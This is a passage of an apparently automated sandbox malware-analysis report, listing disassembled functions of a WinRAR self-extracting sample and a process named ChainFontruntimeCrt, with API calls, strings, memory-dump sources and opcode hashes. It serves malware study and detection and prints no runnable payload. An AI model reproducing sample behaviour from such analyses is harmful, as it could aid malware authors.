                                                                                                                        • Instruction Fuzzy Hash: A6313922144311AADF30EE54BB026BB73E4DF94B18F14A01EF9A4B7143F7668C81B361
                                                                                                                        Function 00EAB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: }
                                                                                                                        • API String ID: 176396367-4239843852
                                                                                                                        • Opcode ID: 263137eb62050d3633669196dae3952cddcce42e19bd3511537590c4dfabf84c
                                                                                                                        • Instruction ID: 485dc8802f751b68e83065cdfdf546b7b1bcebce0925a239aeeb521a1aa1349f
                                                                                                                        • Opcode Fuzzy Hash: 263137eb62050d3633669196dae3952cddcce42e19bd3511537590c4dfabf84c
                                                                                                                        • Instruction Fuzzy Hash: EC2135729043065ADB31EA64D841FABB3DDDF8A718F00242AF540EB143FB64FD4883A2
                                                                                                                        Function 00E9F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E9F2E4
                                                                                                                          • Part of subcall function 00E9F2C5: GetProcAddress.KERNEL32(00ED81C8,CryptUnprotectMemory), ref: 00E9F2F4
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00E9F33E), ref: 00E9F3D2
                                                                                                                        Strings
                                                                                                                        • CryptUnprotectMemory failed, xrefs: 00E9F3CA
                                                                                                                        • CryptProtectMemory failed, xrefs: 00E9F389
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CurrentProcess
                                                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                        • API String ID: 2190909847-396321323
                                                                                                                        • Opcode ID: d39165f7a3c02420c3b9ea6dfe9c2ed39992ae66b55428da018d006dfe0a50c2
                                                                                                                        • Instruction ID: 54a529f758350568d72c708a6ced77bc74abc113a80d255fe0e10acc0e03ad73
                                                                                                                        • Opcode Fuzzy Hash: d39165f7a3c02420c3b9ea6dfe9c2ed39992ae66b55428da018d006dfe0a50c2
                                                                                                                        • Instruction Fuzzy Hash: DD112631601229AFEF15EF32DD42A6E3754FF00764B14A12AFC45BB261DA399D468690
                                                                                                                        Function 00EA101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00010000,00EA1160,?,00000000,00000000), ref: 00EA1043
                                                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 00EA108A
                                                                                                                          • Part of subcall function 00E96C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E96C54
                                                                                                                          • Part of subcall function 00E96DCB: _wcschr.LIBVCRUNTIME ref: 00E96E0A
                                                                                                                          • Part of subcall function 00E96DCB: _wcschr.LIBVCRUNTIME ref: 00E96E19
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                        • String ID: CreateThread failed
                                                                                                                        • API String ID: 2706921342-3849766595
                                                                                                                        • Opcode ID: f3bd2f16a5ca0ad5d3e04f54eca2839df2b7a6456155d0e01000513fbb614b7a
                                                                                                                        • Instruction ID: ea14ac360c207241f522e04799f209c5c4822d3233e1f763b6aa3bde456554da
                                                                                                                        • Opcode Fuzzy Hash: f3bd2f16a5ca0ad5d3e04f54eca2839df2b7a6456155d0e01000513fbb614b7a
                                                                                                                        • Instruction Fuzzy Hash: 19014EB53003097FD3306F74AC92F76B398EB45350F10106FF64276280CAA178854620
                                                                                                                        Function 00E9C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: <9$?*<>|"
                                                                                                                        • API String ID: 2691759472-2723886458
                                                                                                                        • Opcode ID: 8e1de329dd3947d96d056791f87425acf147135ff0bd659c05dcc25ef6ae5fb6
                                                                                                                        • Instruction ID: 1e9025dde7cbb178bc2689f6b2bb7aaf58b4637ef3e40aba8d5f77e5de9ced68
                                                                                                                        • Opcode Fuzzy Hash: 8e1de329dd3947d96d056791f87425acf147135ff0bd659c05dcc25ef6ae5fb6
                                                                                                                        • Instruction Fuzzy Hash: 35F0D113A84301C1DF303A289911732B3E4EF95328F34281FE5C4E72C2E6A288C08266
                                                                                                                        Function 00EADB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: Software\WinRAR SFX$
                                                                                                                        • API String ID: 176396367-3959033184
                                                                                                                        • Opcode ID: 9d8a2453546e6372945295d705d2fd0c30fdeade08495eb775a5c1d71f664021
                                                                                                                        • Instruction ID: 0a4ff539750df90bb78f7796a359d3b6af2f7944fe1961d68c9ac788d87814af
                                                                                                                        • Opcode Fuzzy Hash: 9d8a2453546e6372945295d705d2fd0c30fdeade08495eb775a5c1d71f664021
                                                                                                                        • Instruction Fuzzy Hash: 55017171500258BEDB219B61DC0AFEB7FBCEF49754F000062B549B5061DBB09B88C6E1
                                                                                                                        Function 00EBBB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EB97E5: GetLastError.KERNEL32(?,00ED1030,00EB4674,00ED1030,?,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB97E9
                                                                                                                          • Part of subcall function 00EB97E5: _free.LIBCMT ref: 00EB981C
                                                                                                                          • Part of subcall function 00EB97E5: SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB985D
                                                                                                                          • Part of subcall function 00EB97E5: _abort.LIBCMT ref: 00EB9863
                                                                                                                        • _abort.LIBCMT ref: 00EBBB80
                                                                                                                        • _free.LIBCMT ref: 00EBBBB4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_abort_free
                                                                                                                        • String ID: p
                                                                                                                        • API String ID: 289325740-2678736219
                                                                                                                        • Opcode ID: a95de907a5a1b15440c9efa233a20937cb45b44490819c11cc9384212bfe16cc
                                                                                                                        • Instruction ID: 8eb56c4a401118d13c1ecf9c93299e6d4de3db6822fe41c5b1878f8468726133
                                                                                                                        • Opcode Fuzzy Hash: a95de907a5a1b15440c9efa233a20937cb45b44490819c11cc9384212bfe16cc
                                                                                                                        • Instruction Fuzzy Hash: 5701C431D006219FCB21AF69D841ADFB7E0BF08724B15211AE82477395CBB26D02CFC1
                                                                                                                        Function 00EAB425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Malloc
                                                                                                                        • String ID: ($Z
                                                                                                                        • API String ID: 2696272793-3316338816
                                                                                                                        • Opcode ID: 222563026212bf075d1a70032534f3d77cbef06e86fb5eb2adf29695d4d8708c
                                                                                                                        • Instruction ID: 1ad95e654ac6ad0b9826d83065b8dcb0c07883557941a5962cf858703a1f88f4
                                                                                                                        • Opcode Fuzzy Hash: 222563026212bf075d1a70032534f3d77cbef06e86fb5eb2adf29695d4d8708c
                                                                                                                        • Instruction Fuzzy Hash: C5016D76600108FF9F059FB1DC49CEE7B6DEF093447004156B906E7120EB31AA48DB60
                                                                                                                        Function 00EB8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBBF30: GetEnvironmentStringsW.KERNEL32 ref: 00EBBF39
                                                                                                                          • Part of subcall function 00EBBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EBBF5C
                                                                                                                          • Part of subcall function 00EBBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EBBF82
                                                                                                                          • Part of subcall function 00EBBF30: _free.LIBCMT ref: 00EBBF95
                                                                                                                          • Part of subcall function 00EBBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EBBFA4
                                                                                                                        • _free.LIBCMT ref: 00EB82AE
                                                                                                                        • _free.LIBCMT ref: 00EB82B5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                        • String ID: 0"
                                                                                                                        • API String ID: 400815659-420201205
                                                                                                                        • Opcode ID: 612b1913c789cca87bc8712c225e1af7584d133cc7af0e97a932b98255dc3110
                                                                                                                        • Instruction ID: b2d71559ee77d68440eaf0ee20d61375221734b88661c8c464041fc243561c9f
                                                                                                                        • Opcode Fuzzy Hash: 612b1913c789cca87bc8712c225e1af7584d133cc7af0e97a932b98255dc3110
                                                                                                                        • Instruction Fuzzy Hash: B4E0653370695245B661327A6E426FB168C4FC1338B55362AF610B62F3DF508802C9A6
                                                                                                                        Function 00EA0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00EA1206,?), ref: 00EA0FEA
                                                                                                                        • GetLastError.KERNEL32(?), ref: 00EA0FF6
                                                                                                                          • Part of subcall function 00E96C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E96C54
                                                                                                                        Strings
                                                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00EA0FFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                        • API String ID: 1091760877-2248577382
                                                                                                                        • Opcode ID: b270f71876684c6a1a1dcb309974294f1ca3415b2abda5abffd7f909211a464a
                                                                                                                        • Instruction ID: 704e74bdb23352138d087798bf1495be28fbd45dcd21ef71d065dbf21c9e80f6
                                                                                                                        • Opcode Fuzzy Hash: b270f71876684c6a1a1dcb309974294f1ca3415b2abda5abffd7f909211a464a
                                                                                                                        • Instruction Fuzzy Hash: 18D02B725041203ACA1033345D07D6E7804DB52331F105716F438742F6CA1209834291
                                                                                                                        Function 00E9E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00E9DA55,?), ref: 00E9E2A3
                                                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E9DA55,?), ref: 00E9E2B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                        • String ID: RTL
                                                                                                                        • API String ID: 3537982541-834975271
                                                                                                                        • Opcode ID: 12ad1631a2c025450a5b8a57e5516e7d2320727982a079a5507c6fdc1c005bbf
                                                                                                                        • Instruction ID: badc17bdb16f27a14e96b59afede742eb9262953d8e2a291153279b27312683a
                                                                                                                        • Opcode Fuzzy Hash: 12ad1631a2c025450a5b8a57e5516e7d2320727982a079a5507c6fdc1c005bbf
                                                                                                                        • Instruction Fuzzy Hash: 63C012326407106AEA3057756D0EF436A586B01B15F09545CB241F96D1D6E6C54686A1
                                                                                                                        Function 00EAE47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE467
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: U$z
                                                                                                                        • API String ID: 1269201914-4031037884
                                                                                                                        • Opcode ID: cc6ace6e13fe527d0b91830ed145ef8799d067d36ab31c7bb324381cac8dcc4c
                                                                                                                        • Instruction ID: 9da85100e684c56c9e8a801e693e80f86e1b82ed31dab69af7d4ae5f60b4052b
                                                                                                                        • Opcode Fuzzy Hash: cc6ace6e13fe527d0b91830ed145ef8799d067d36ab31c7bb324381cac8dcc4c
                                                                                                                        • Instruction Fuzzy Hash: A8B012D16581007C310851245E03E37014CC1CEF10330B02FF518F8281DC442E010532
                                                                                                                        Function 00EAE470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE467
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: U$p
                                                                                                                        • API String ID: 1269201914-1412734706
                                                                                                                        • Opcode ID: 316671982d65f2abe478c8f80d902e2b666bc0b062faaa9a17a0b8e6f4e26ce4
                                                                                                                        • Instruction ID: f2f93a6bec4291d31d78ee53d202ff3cc246ba85c6e3754c5d2e91e510c77e40
                                                                                                                        • Opcode Fuzzy Hash: 316671982d65f2abe478c8f80d902e2b666bc0b062faaa9a17a0b8e6f4e26ce4
                                                                                                                        • Instruction Fuzzy Hash: A0B012C1759140BC310891241E03D37014CC1CEF50330B02FF918F8281DC406C010532

                                                                                                                        Executed Functions

                                                                                                                        Function 00007FFD9B7D0D4F Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 5[_H
                                                                                                                        • API String ID: 0-3279724263
                                                                                                                        • Opcode ID: fea8854a2edea5a26635641ea61ec144a9afc9ae4aef87653f1a6ad761e3ebe8
                                                                                                                        • Instruction ID: 4f503156503fc03d7a1fd52eb342d518af734a16fcdd00047e815cdcc2e37936
                                                                                                                        • Opcode Fuzzy Hash: fea8854a2edea5a26635641ea61ec144a9afc9ae4aef87653f1a6ad761e3ebe8
                                                                                                                        • Instruction Fuzzy Hash: 9BB10575A1DAC94FE759DF688875BA9BFE0EF96310F0502FAD049CB2E2CA781805C750
                                                                                                                        Function 00007FFD9BBE926F Relevance: .7, Instructions: 725COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 30a4e5a7b6be0a31234b843eaa80fab263925d67fca48cb63144542d205b8f82
                                                                                                                        • Instruction ID: 42eab4b966ad2cb0ce38b121ed8bfbd6ccab5fdd829de2f43fccd0c371e966f8
                                                                                                                        • Opcode Fuzzy Hash: 30a4e5a7b6be0a31234b843eaa80fab263925d67fca48cb63144542d205b8f82
                                                                                                                        • Instruction Fuzzy Hash: 4552D230A196498FDB6CCF58C4A86BD7BA1FF49304F5045BDC49EC72E6CA38A945CB81
                                                                                                                        Function 00007FFD9BBE3AF2 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: _H
                                                                                                                        • API String ID: 0-1721965084
                                                                                                                        • Opcode ID: 7f9382b89b318451a43ccdc89d86c575de688e9e09fdb4f721904f80aee2479a
